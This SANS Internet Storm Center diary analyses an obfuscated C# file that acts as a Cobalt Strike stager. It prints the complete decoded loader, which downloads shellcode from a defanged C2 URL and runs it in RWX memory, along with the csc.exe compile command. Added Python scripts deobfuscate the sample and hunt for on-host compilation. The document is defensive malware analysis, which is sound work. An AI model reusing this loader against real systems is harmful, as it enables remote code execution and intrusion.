CSharp Payload Phoning to a CobaltStrike Server, (Fri, Dec 15th)

I found an interesting C# source file on VT a few days ago. Its score is only 3/59 (SHA256: 5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a)[1].

It has been a long time since I saw payloads ready to be compiled; I did some research on self-compiling malware in 2020[2]. I think the file was uploaded to VT to check the detection rate of AV vendors, because the Cobalt Strike server is a private IP address. Or was it in the scope of some red team exercise?

The source is obfuscated: the junk sequence ">(h" is inserted between every character of the real code and stripped at runtime with a single Replace() call:

string pRVSczAKPboj = "u>(hs>(hi>(hn>(hg>(h
[…payload removed…]
>(h >(h0>(hx>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(h)>(h;>(h}>(h}>(h}".Replace(">(h", "");

Here is the decoded payload, which is easy to understand:

using System;
using System.Net;
using System.Runtime.InteropServices;

namespace GnRiolRYuAcH
{
    public class EpQmktOhiwXb
    {
        // Win32 imports: allocate executable memory, run it in a new thread, wait on it.
        // Pointer-sized arguments are declared as UInt64, so this only works as a 64-bit process.
        [DllImport("kernel32")] private static extern UInt64 VirtualAlloc(UInt64 zJAjSroWZVkI, UInt64 KaWcaAtEjRML, UInt64 PRZMeuJQylhj, UInt64 lDLVdityOBmY);
        [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt64 NxVjPRlolSsT, UInt64 EZnBMZtLXzTZ, UInt64 mNXqHtnujBJm, IntPtr BVcXnWWYhroa, UInt64 rckVAtyTWXhW, ref UInt64 OUmSsFQyEEnY);
        [DllImport("kernel32")] private static extern UInt64 WaitForSingleObject(IntPtr ucXgBIyufbdT, UInt64 nmJKJtodAzHm);
        [DllImport("kernel32.dll")] static extern IntPtr GetConsoleWindow();
        [DllImport("user32.dll")] static extern bool ShowWindow(IntPtr holpJgOYqcKG, int viaQwLWOkGFp);

        public static void Main()
        {
            // Hide the console window (SW_HIDE = 0).
            ShowWindow(GetConsoleWindow(), 0);

            // Fetch the stager from the C2 with browser-looking headers.
            WebClient sbTBMGCfElPa = new System.Net.WebClient();
            sbTBMGCfElPa.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");
            sbTBMGCfElPa.Headers.Add("Accept", "*/*");
            sbTBMGCfElPa.Headers.Add("Accept-Language", "en-gb,en;q=0.5");
            byte[] AjVmuebayNvb = null;
            AjVmuebayNvb = sbTBMGCfElPa.DownloadData("hxxp://192[.]168[.]1[.]28:1234/Qm3k");

            // Byte-for-byte copy of the downloaded blob (the "- 0" skips nothing).
            byte[] BlAVsJsniHyM = new byte[AjVmuebayNvb.Length - 0];
            Array.Copy(AjVmuebayNvb, 0, BlAVsJsniHyM, 0, BlAVsJsniHyM.Length);

            // MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40): RWX memory for the shellcode.
            UInt64 gltoUfDFqsfu = VirtualAlloc(0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40);
            Marshal.Copy(BlAVsJsniHyM, 0, (IntPtr) (gltoUfDFqsfu), BlAVsJsniHyM.Length);

            // Run the buffer as a thread entry point and block forever (INFINITE = 0xFFFFFFFF).
            IntPtr wnvVIenBotAX = IntPtr.Zero;
            UInt64 DfVxARfvlcwx = 0;
            IntPtr YBKUjHKOUGUq = IntPtr.Zero;
            wnvVIenBotAX = CreateThread(0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx);
            WaitForSingleObject(wnvVIenBotAX, 0xFFFFFFFF);
        }
    }
}

The behaviour is classic: the console window is hidden, the payload is downloaded from the internal IP with a browser-like User-Agent, a buffer is allocated with VirtualAlloc(MEM_COMMIT = 0x1000, PAGE_EXECUTE_READWRITE = 0x40), the bytes are copied into it and started in a new thread, and WaitForSingleObject(INFINITE) keeps the process alive while that thread runs. The URI is telling too: the checksum8 of "Qm3k" (the sum of its ASCII codes modulo 256) is 92, the value Metasploit and Cobalt Strike stagers use for their initial request[3].
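Here is a small triage script that automates what was done by hand above, for both the deobfuscation and the URL check. It is an added example, not the sample's code and not part of the original diary. The input is a constructed stand-in that re-creates the sample's trick (the relevant decoded lines wrapped in a C# string literal with the ">(h" marker between every character); the marker is recovered from the Replace() call rather than hard-coded, the defanged URL is refanged, and the checksum8 table is taken from the ISC diary on Metasploit and Cobalt Strike URLs[3]. The regexes and the STAGER_CHECKSUMS mapping are my assumptions, not something the sample contains.

```python
"""Offline triage of a junk-marker obfuscated C# downloader.

Added example (not the ISC author's code, not the file from VT). The input is
a constructed stand-in that re-creates the sample's trick: the real source sits
in a string literal with a junk marker between every character, stripped at
runtime by String.Replace().
"""
import re
from urllib.parse import urlparse

JUNK = ">(h"  # marker used by the sample discussed above


def obfuscate(src: str, junk: str = JUNK) -> str:
    """Build the constructed input: escape src as a C# string literal, then put
    the junk marker between every character (escape sequences stay whole so
    the literal is still valid C#)."""
    escaped = src.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
    units = re.findall(r"\\.|.", escaped, re.S)
    return junk.join(units)


# Constructed stand-in, NOT the VT file: only the decoded lines that matter.
DECODED_LINES = (
    'AjVmuebayNvb = sbTBMGCfElPa.DownloadData ("hxxp://192[.]168[.]1[.]28:1234/Qm3k");\n'
    "UInt64 gltoUfDFqsfu = VirtualAlloc (0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40);\n"
    "wnvVIenBotAX = CreateThread (0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx);\n"
)
SAMPLE = 'string pRVSczAKPboj = "' + obfuscate(DECODED_LINES) + '".Replace(">(h", "");'

# <literal>.Replace("<marker>", "") : group 1 = literal body, group 2 = marker.
LITERAL_RE = re.compile(
    r'"((?:[^"\\]|\\.)*)"\s*\.Replace\s*\(\s*"((?:[^"\\]|\\.)+)"\s*,\s*""\s*\)', re.S
)
URL_RE = re.compile(r'h(?:tt|xx)ps?://[^\s"\'\\)]+')  # accepts defanged hxxp:// too

# checksum8 values stagers use on their first request, per the ISC diary [3]:
# 92 = Metasploit URI_CHECKSUM_INITW / Cobalt Strike x86, 93 = Cobalt Strike x64.
STAGER_CHECKSUMS = {92: "Metasploit / Cobalt Strike x86 stager", 93: "Cobalt Strike x64 stager"}


def find_junk_marker(src: str):
    """Recover the marker from the Replace() call instead of guessing it."""
    m = LITERAL_RE.search(src)
    return m.group(2) if m else None


def deobfuscate(src: str) -> str:
    """Strip the marker from the literal and undo the C# string escapes."""
    m = LITERAL_RE.search(src)
    if not m:
        raise ValueError('no <literal>.Replace("<marker>", "") pattern found')
    body, marker = m.group(1), m.group(2)
    stripped = body.replace(marker, "")
    return re.sub(r"\\(.)", lambda e: {"n": "\n"}.get(e.group(1), e.group(1)), stripped)


def refang(url: str) -> str:
    return url.replace("hxxp", "http").replace("[.]", ".")


def checksum8(uri_path: str) -> int:
    """Sum of the ASCII codes of the path (without the leading '/'), mod 256."""
    return sum(uri_path.lstrip("/").encode("ascii")) % 256


def triage(src: str) -> dict:
    """Deobfuscate, pull out URLs and flag the RWX-alloc + new-thread pattern."""
    decoded = deobfuscate(src)
    urls = [refang(u) for u in URL_RE.findall(decoded)]
    stager_hits = {}
    for u in urls:
        c = checksum8(urlparse(u).path)
        if c in STAGER_CHECKSUMS:
            stager_hits[u] = STAGER_CHECKSUMS[c]
    return {
        "marker": find_junk_marker(src),
        "urls": urls,
        "stager_hits": stager_hits,
        # VirtualAlloc(..., PAGE_EXECUTE_READWRITE = 0x40) followed by CreateThread()
        "rwx_alloc": re.search(r"VirtualAlloc\s*\([^;]*0x40\s*\)", decoded) is not None,
        "thread_exec": re.search(r"\bCreateThread\s*\(", decoded) is not None,
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The checksum test is a cheap pivot for the SOC: once a URL like this is known, the same checksum8 check can be run over proxy logs to find other stager requests that use the same generator, whatever the random path is.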

This can be compiled and executed on any Windows computer with the .NET Framework installed (read: 99% of them!):

C:\Windows\Microsoft.NET\Framework\v4.0.30319>csc.exe /t:exe /out:payload.exe c:\users\rem\Desktop\pJmOrSymbiAM.cs

Indeed, all of you have a C# compiler installed on your computers, even if you're not developers: csc.exe ships with the .NET Framework, no Visual Studio required.
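Because csc.exe is on every box, the defender's side of this is to watch for it being used to turn a .cs file into an executable from a user-writable location. The following is an added example, not part of the diary: it classifies constructed process-creation events (Sysmon Event ID 1 style, only the Image, CommandLine and ParentImage fields) and carves out the one noisy legitimate case I am assuming you will see everywhere, PowerShell's Add-Type, which feeds csc.exe a .cmdline response file from %TEMP% with no .cs file on the command line. The event list, the paths in it and the USER_WRITABLE prefixes are my assumptions; confirm the Add-Type pattern against your own telemetry before relying on it.

```python
"""Hunting for on-host compilation with csc.exe in process-creation events.

Added example, not from the ISC diary. Events are constructed dicts with the
three Sysmon Event ID 1 fields the logic needs (Image, CommandLine,
ParentImage). The benign rule for PowerShell's Add-Type is an assumption.
"""
import re
from pathlib import PureWindowsPath

TOKEN_RE = re.compile(r'"[^"]*"|\S+')          # quoted token or bare token
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\public\\")

# Constructed events (all paths are made up); event 0 mirrors the compile shown above.
EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /t:exe /out:payload.exe c:\users\rem\Desktop\pJmOrSymbiAM.cs",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\rem\AppData\Local\Temp\k2m1e3\k2m1e3.cmdline"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /t:library /out:C:\build\app\bin\Util.dll C:\build\app\src\Util.cs",
     "ParentImage": r"C:\Program Files\MSBuild\msbuild.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe c:\users\rem\Desktop\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def tokenize(cmdline: str) -> list:
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_csc(cmdline: str) -> dict:
    """Extract target type, /out: path, .cs sources and @response files.
    csc.exe builds a console exe when no /target: is given."""
    info = {"target": "exe", "out": None, "sources": [], "response_files": []}
    for tok in tokenize(cmdline)[1:]:          # [0] is the image itself
        low = tok.lower()
        if low.startswith(("/t:", "/target:", "-t:", "-target:")):
            info["target"] = low.split(":", 1)[1]
        elif low.startswith(("/out:", "-out:")):
            info["out"] = tok.split(":", 1)[1]
        elif tok.startswith("@"):
            info["response_files"].append(tok[1:].strip('"'))
        elif low.endswith(".cs"):
            info["sources"].append(tok)
    return info


def in_user_writable(path) -> bool:
    return bool(path) and any(p in path.lower() for p in USER_WRITABLE)


def classify(event: dict) -> str:
    """'ignore' (not csc.exe), 'benign-add-type', 'suspicious' or 'other'."""
    if PureWindowsPath(event["Image"]).name.lower() != "csc.exe":
        return "ignore"
    info = parse_csc(event["CommandLine"])
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    # Assumed benign pattern: PowerShell Add-Type hands csc.exe a .cmdline
    # response file and passes no .cs file on the command line.
    if (parent in ("powershell.exe", "pwsh.exe") and info["response_files"]
            and all(r.lower().endswith(".cmdline") for r in info["response_files"])
            and not info["sources"]):
        return "benign-add-type"
    produces_exe = info["target"] in ("exe", "winexe") or (info["out"] or "").lower().endswith(".exe")
    from_user_dir = in_user_writable(info["out"]) or any(in_user_writable(s) for s in info["sources"])
    return "suspicious" if produces_exe and from_user_dir else "other"


def hunt(events) -> list:
    """Command lines worth an analyst's look."""
    return [e["CommandLine"] for e in events if classify(e) == "suspicious"]


if __name__ == "__main__":
    for e in EVENTS:
        print(f'{classify(e):16} {e["CommandLine"]}')
```

The rule deliberately keys on the outcome (an executable built from a user-writable path) rather than on csc.exe alone, because the compiler itself runs many times a day on a normal workstation.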

Usually, this kind of code is written in PowerShell, but this technique looks stealthier. Or maybe not! I uploaded my compiled file to VT, and it got a bad score of 36/72[4].

[1] https://www.virustotal.com/gui/file/5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a/detection
[2] https://www.sans.org/webcasts/atmic-talk-self-compiling-malware-114085/
[3] https://isc.sans.edu/diary/Finding+Metasploit+Cobalt+Strike+URLs/27204
[4] https://www.virustotal.com/gui/file/2bd26546e09eff4675d020dab3da4fc6cb08bad9637905ac792d16a4a8937bcf/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.